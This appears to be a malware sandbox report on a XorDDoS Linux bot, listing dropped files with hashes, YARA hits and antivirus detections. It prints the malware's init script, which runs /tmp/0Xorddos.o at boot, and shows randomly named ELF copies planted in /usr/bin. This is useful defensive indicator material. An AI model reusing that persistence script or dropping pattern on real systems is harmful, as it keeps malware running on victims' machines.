                                                                                                                                                Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: 0Xorddos.o.### BEGIN INIT INFO.# Provides:..0Xorddos.o.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.0Xorddos.o.### END INIT INFO.case $1 in.start)../tmp/0Xorddos.o..;;.stop)..;;.*)../tmp/0Xorddos.o..;;.esac.

                                                                                                                                                /memfd:snapd-env-generator (deleted)

                                                                                                                                                Download File
                                                                                                                                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):76
                                                                                                                                                Entropy (8bit):3.7627880354948586
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                                                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                                                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                                                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                                                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                                                                                                                                /run/gcc.pid

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32
                                                                                                                                                Entropy (8bit):3.8431390622295662
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:fdXKJE94RGWN:fgJ7RBN
                                                                                                                                                MD5:BC3ECE281088B7A2F325D5D7365CDDC5
                                                                                                                                                SHA1:E7241FE2E1A55BBB44D85AAA6B1ECBEF1A0EED45
                                                                                                                                                SHA-256:59C383DB9C95D8BC8A6ECB8E13F75B9D6C93A00DD01A16B944D78D1380C2FF4E
                                                                                                                                                SHA-512:10BE855AEA473511C7CE92670548FB739B4CE11ECAF4DD2D7147CDF963D7DF9E8DBFD7E835006BDB2F326B54950D2BEB93E9D7EBEE221E6965EF9C8B090601CC
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:ccqixroquutawfxidxtibsbbatzhzrcb

                                                                                                                                                /usr/bin/aoyymackpm

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244493221850218
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AJ:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91+
                                                                                                                                                MD5:4B35D88168505669DF2E8BA08379E487
                                                                                                                                                SHA1:47AFC160CC700BAEE519DFB79D2B1140B0D4A94F
                                                                                                                                                SHA-256:B9A1D39B33F81010A0BF173ABBDD488771484CD319455C5B5B76B80986B096C3
                                                                                                                                                SHA-512:2EF98CDF414AD4F9DBAAC784738F444EF6A7B36D40D78DE98D14E24A7D51A0D0459C0B2E0E566181EED4E0D8C6433A2025B1C0300C8FBB683FE4FBAC0E769BBF
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/aoyymackpm, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/aoyymackpm, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/aoyymackpm, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/cukrqcagnz

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.24449948056327
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A9:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/912
                                                                                                                                                MD5:C8D0992125712B7648CE9D7C261DECEA
                                                                                                                                                SHA1:317F319C1968F329D225EEF558DDF53537B8FDFC
                                                                                                                                                SHA-256:62A78007649CFD64826B71994A3DBD59DE437C204A3FAF3779B7FE747B427814
                                                                                                                                                SHA-512:7AA01970883F731CA6A05C9FC590658F10C20A5B7936C85297E3C48906014F76B541EBE40998143CC0A219FC92F60366FB4A30ADA0B2A5000016FDFC0E488A53
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cukrqcagnz, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cukrqcagnz, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/cukrqcagnz, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/cvltgpdmgk

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244493384035504
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/911
                                                                                                                                                MD5:868C28A2F8B2CA95F48A4E00A2889E23
                                                                                                                                                SHA1:D98EE9FB929FCF943F5F7E73898D6DB6CAE2C506
                                                                                                                                                SHA-256:4ABC032921CBDF1589DA8037CA84EA07E1A6AC40027030EEB5FC039ACC264995
                                                                                                                                                SHA-512:7E2412A34796145ED287A72DC6404DC1941155487F7D22CA2E0117310A1384ADE6AAB5A0E9456563A93C4EE10A171B1047E3789D6B1D9BB774F87E43C18F85F8
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cvltgpdmgk, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cvltgpdmgk, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/cvltgpdmgk, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/cvvhpkxdyk

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):610304
                                                                                                                                                Entropy (8bit):6.209349289572672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl3
                                                                                                                                                MD5:96320734381749DA66B251CF007D8FF5
                                                                                                                                                SHA1:8DFA9E396C77317A2938AE9DBDA5BED0F747C673
                                                                                                                                                SHA-256:0774FEC8F52346211FC87FCB41318D9BD3ED00A1F00D9D13E10FE64F8313661B
                                                                                                                                                SHA-512:ECF20530AD8A53E9C5515B83FF2410F55C6BD8B4F8A82AF5BE2BE80C73C0A3920DC23E04534BB4161F5368D483F5D54F24D9B645D7312BC6E42BCED37A0F4B96
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cvvhpkxdyk, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cvvhpkxdyk, Author: ditekSHen
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/gbsknxiwip

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244502294476434
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1At:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91m
                                                                                                                                                MD5:332829866022C2218579E44D63C2DAE3
                                                                                                                                                SHA1:E3616AB2946C1B3256B194BD70D1EA6D19A16767
                                                                                                                                                SHA-256:9B3C568C241B3FFE14814ED803574A19AAEEF188DB1A3715CC8990A35428CC81
                                                                                                                                                SHA-512:B57B18BAD9C7F43B2F824CB6264F85EB86D4C5447AF713AD67D0C65733AFB285D5FD1E867C9B528E706DDD4893A3F8C24000E422640BDCC8B154F8AD823CB2C2
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gbsknxiwip, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gbsknxiwip, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/gbsknxiwip, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/gpcmhoiszu

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244497243971949
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AR:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91q
                                                                                                                                                MD5:2398B188E4CCDFA7852549D00ECE9EB7
                                                                                                                                                SHA1:77E532E484720DA9DA4D72C4447457F17B674CF7
                                                                                                                                                SHA-256:5330F23C3C97D7D729BF2BEC498A37B23FD3C96CE9CC71B27BB8DF6C4AD181BC
                                                                                                                                                SHA-512:8030EF47C055AF9BDBFF658E8361E7023922B861C936058479EC0C76D28D6253E57A375E3B8ED9A4D17A792BB2EA070535F1DAC14F04F5316596250A45B7F88F
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gpcmhoiszu, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gpcmhoiszu, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/gpcmhoiszu, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/njezqqgxiu

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.24449797058036
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ad:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91u
                                                                                                                                                MD5:1E085BDF101BBE4F3C0DD1FE168620DF
                                                                                                                                                SHA1:105FEA7C611E07B50537F71C5663B52F735ED4E1
                                                                                                                                                SHA-256:36CBFA998C2B904E2CB8D5425934A0231617CCDE37DA7FA5B523C03CEEDBFF31
                                                                                                                                                SHA-512:5EB8C41FA76992926D0C7BED91264613371E70DE2AAC7164814FB677129E3E79F90BAFBAB00156A6131B3A1833DBD88CCFA94CEA907664937BF649029963E668
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/njezqqgxiu, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/njezqqgxiu, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/njezqqgxiu, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/qizbpqmtbi

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.24448863231829
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AD:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91o
                                                                                                                                                MD5:A1B79114B59E6FC4CB28E756F2425224
                                                                                                                                                SHA1:51841ECD47D554261AC2CFB6E477519BFDC784C4
                                                                                                                                                SHA-256:D730F46771EBB455F2D08332B6FC6474421DB9BF76E839B629AB717A6BAA0F9D
                                                                                                                                                SHA-512:B43F0864C9ACAB1CD4F3484119013149A1F9329591431A216EE4C93C81BFBD68EC4936A78FEE529FF4BE1B75B5BEC389614B75420DF79C090D45D23184992F7E
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qizbpqmtbi, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qizbpqmtbi, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qizbpqmtbi, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/tngemhgnzk

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244498067523995
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Af:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91E
                                                                                                                                                MD5:67D9C73D144874E910413A9FF5F8BE8D
                                                                                                                                                SHA1:61B354B42973E17FB1C8FA7C513B15C5C418C143
                                                                                                                                                SHA-256:3AE57392515324670606A81BCC629EBF65B9E4CDBAA473077250BE2D061AA664
                                                                                                                                                SHA-512:DD9ED957D3B34663AB07ECA934DB6081E7D9C76F4C5CA7ECF374BA8F8CAB320863B9A0A9A5B7E5C7E3D13CE9924EBE586D69E6EBA1ADC6C3FFD124CBA14BA8AA
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tngemhgnzk, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tngemhgnzk, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tngemhgnzk, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/uqxezzsakx

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244491917701131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/915
                                                                                                                                                MD5:67365F9C1F2B194742925772FC9232AB
                                                                                                                                                SHA1:CD76AC8FA8808D4B1D4CACCA019E6E63C8572510
                                                                                                                                                SHA-256:0133176167FFD3F23114DB6E4D5EE5ECA29169F19F3ED478638B7814DE8769BE
                                                                                                                                                SHA-512:1E350A1E7B324D47D0A5AC7464776DB55C246857A0191AAECE17CDCD68F51E770E4C93746F17B99F9CDC933FF74546A44F0C018AD390DFF3D6E40FB87EDB8311
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uqxezzsakx, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uqxezzsakx, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uqxezzsakx, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/wzulpfbuxk

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244496966776473
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ag:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91H
                                                                                                                                                MD5:3544260D47ADF075442CC29318BED673
                                                                                                                                                SHA1:0D5845EAC61847C9F6F700DEBC97A994AC893EBD
                                                                                                                                                SHA-256:F0BA0D6136D87D1C398BC8C441AE1A97181AA3ECCDC730D7D163543851C32767
                                                                                                                                                SHA-512:6529DDD1923DC3BB5D0752985E0091AEB2DC29221CA38D0F9202430FD6A2BA2A0DF801B63836B587EA73151F17482D3D2306AA6CDA7D7A6A86529C214AE80548
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wzulpfbuxk, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wzulpfbuxk, Author: ditekSHen
